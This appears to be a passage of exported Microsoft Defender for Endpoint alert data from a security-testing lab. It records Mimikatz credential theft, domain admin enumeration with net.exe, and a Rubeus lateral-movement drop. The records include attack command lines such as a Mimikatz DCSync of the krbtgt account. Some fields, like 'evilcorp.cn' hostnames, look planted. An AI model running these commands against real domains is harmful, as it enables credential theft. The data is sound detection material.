"4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:10:32.76Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"net.exe\" group \"Enterprise Admins\" /domain", "processCreationTime": "2022-11-18T05:09:25.3452698Z", "processId": 8576, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:10:32.76Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"net.exe\" user ronhd /domain", "processCreationTime": "2022-11-18T05:09:25.7709122Z", "processId": 10444, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:10:32.76Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:10:32.76Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"net.exe\" user /domain", "processCreationTime": "2022-11-18T05:09:25.0828512Z", "processId": 7228, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:10:32.76Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z", "parentProcessFileName": "explorer.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 4680, "processCommandLine": "\"powershell.exe\" ", "processCreationTime": "2022-11-18T05:04:12.7150402Z", "processId": 4976, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:14:28.7766667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"net.exe\" group /domain", "processCreationTime": "2022-11-18T05:13:18.980624Z", "processId": 9780, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:14:28.7766667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain", "processCreationTime": "2022-11-18T05:13:19.0526991Z", "processId": 8200, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:14:28.7766667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"net.exe\" group \"Enterprise Admins\" /domain", "processCreationTime": "2022-11-18T05:13:19.1253311Z", "processId": 7452, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:14:28.7766667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"net.exe\" user ronhd /domain", "processCreationTime": "2022-11-18T05:13:19.5391472Z", "processId": 9788, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:14:28.7766667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"net.exe\" user /domain", "processCreationTime": "2022-11-18T05:13:18.9044348Z", "processId": 2784, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638043450424844453_1508847464
3c8e366d-e1d2-4279-8afa-696d70f2736c
741
MicrosoftDefenderForEndpoint
2022-11-18T05:10:42.4844653Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T05:09:24.6257114Z
2022-11-18T05:10:02.6736516Z
Mimikatz credential theft tool
The Mimikatz hacktool was detected on this device. Mimikatz is a credential theft tool that can harvest plaintext passwords, password hashes, smartcard PINs, and Kerberos tickets. An attacker might be trying to harvest credentials to log into this or other devices on the network, by impersonating a valid user.
CredentialAccess
Resolved
High
47
PartiallyInvestigated
TruePositive
SecurityTesting
WindowsDefenderAv
8cac979e-6dcc-44ad-8355-480eebaff1c1
takeshi@msdxv2.m365dpoc.com
null
Mimikatz
[]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "Low", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:10:42.51Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-18T05:20:49.52Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-18T04:51:48.8933333Z
Benign
Active
Takeshi
TMTOWER-BOOK
S-1-5-21-7316772-2057538409-3008203053-1001
null
null
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
17,772
"mimikatz.exe" "lsadump::dcsync /domain:WORKGROUP /user:krbtgt" exit
2022-11-18T04:48:53.4490025Z
14,616
2022-11-14T04:36:16.5242809Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
83b06aa80899050e5d4132992e36b5b8f14b64e9
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:03:45.04Z
Suspicious
Active
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
4f4970c3545972fea2bc1984d597fc810e6321e0
25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369
net.exe
C:\Windows\System32
1,768
type secret.txt
2022-11-21T02:01:37.7396253Z
11,068
2022-11-21T02:01:28.4753286Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:15:08.81Z
Suspicious
None
operator
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:50:47.8466667Z
Suspicious
None
bob
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
6,324
"powershell.exe" -noexit -command Set-Location -literalPath 'C:\Users\jeff\Desktop'
2022-12-22T08:47:11.8139068Z
null
null
null
null
Detected
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:48:46.78Z
Suspicious
None
user1
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:14:25.5266667Z
Suspicious
None
jeff
prod.env
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638037515444416199_1712741414
660b84c6-7193-4140-a5b8-9e35cd3b78f5
686
MicrosoftDefenderForEndpoint
2022-11-11T08:19:04.4416425Z
2022-11-12T01:35:43.1766667Z
2022-11-12T01:35:42.84Z
2022-11-11T08:17:38.4997149Z
2022-11-11T08:17:38.4997149Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "evilcorp.cn", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-11T08:19:04.5366667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-11T08:19:04.5366667Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4704, "processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt\" exit", "processCreationTime": "2022-11-11T08:17:36.2207277Z", "processId": 2420, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638072963590599097_-155424872
4e390f1a-feee-4335-8b29-fbd8c684cae3
975
MicrosoftDefenderForEndpoint
2022-12-22T08:59:19.0599291Z
2022-12-22T08:59:19.6066667Z
null
2022-12-22T08:47:53.8045023Z
2022-12-22T08:47:53.8045023Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
New
High
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
null
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "evilcorp.cn", "firstSeen": "2022-12-08T05:21:19.944Z", "healthStatus": "Inactive", "loggedOnUsers": [], "mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "1809", "vmMetadata": null } ]
[ { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:59:19.0966667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": "MSDXV8", "entityType": "Process", "evidenceCreationTime": "2022-12-22T08:59:19.0966667Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 6324, "processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv8.m365dpoc.com /user:krbtgt\" exit", "processCreationTime": "2022-12-22T08:47:53.5760604Z", "processId": 6932, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:03:43.73Z
Suspicious
None
jeff
test.domain
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T13:13:04.8233333Z
Malicious
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T17:36:54.33Z
Suspicious
None
svc_acct
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:11:31.4266667Z
Suspicious
None
jeff
evilcorp.cn
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:59:19.2433333Z
Suspicious
None
root
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T15:01:23.99Z
Suspicious
None
guest
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638001153614109510_-2098029372
39764c37-cfcf-41ab-a1e5-e498f46235be
486
MicrosoftDefenderForEndpoint
2022-09-30T06:16:01.4109777Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:12:00.7230146Z
2022-09-30T06:13:04.3382671Z
File dropped and launched from remote location
A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate.
LateralMovement
Resolved
Medium
22
TerminatedBySystem
TruePositive
SecurityTesting
WindowsDefenderAtp
17d50613-c135-4981-858e-86cdecb4e46e
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1021.002", "T1105", "T1570" ]
[ { "aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600", "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:29:47.252Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "steve", "domainName": "MSDXV2" } ], "mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Semi Auto Client", "riskScore": "Critical", "tags": [ "semi auto" ], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66" } } ]
[ { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-09-30T06:16:01.4666667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-09-30T06:16:01.4666667Z", "fileName": "Rubeus.exe", "filePath": "C:\\Temp", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": "Timed out because a pending action was not approved", "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": 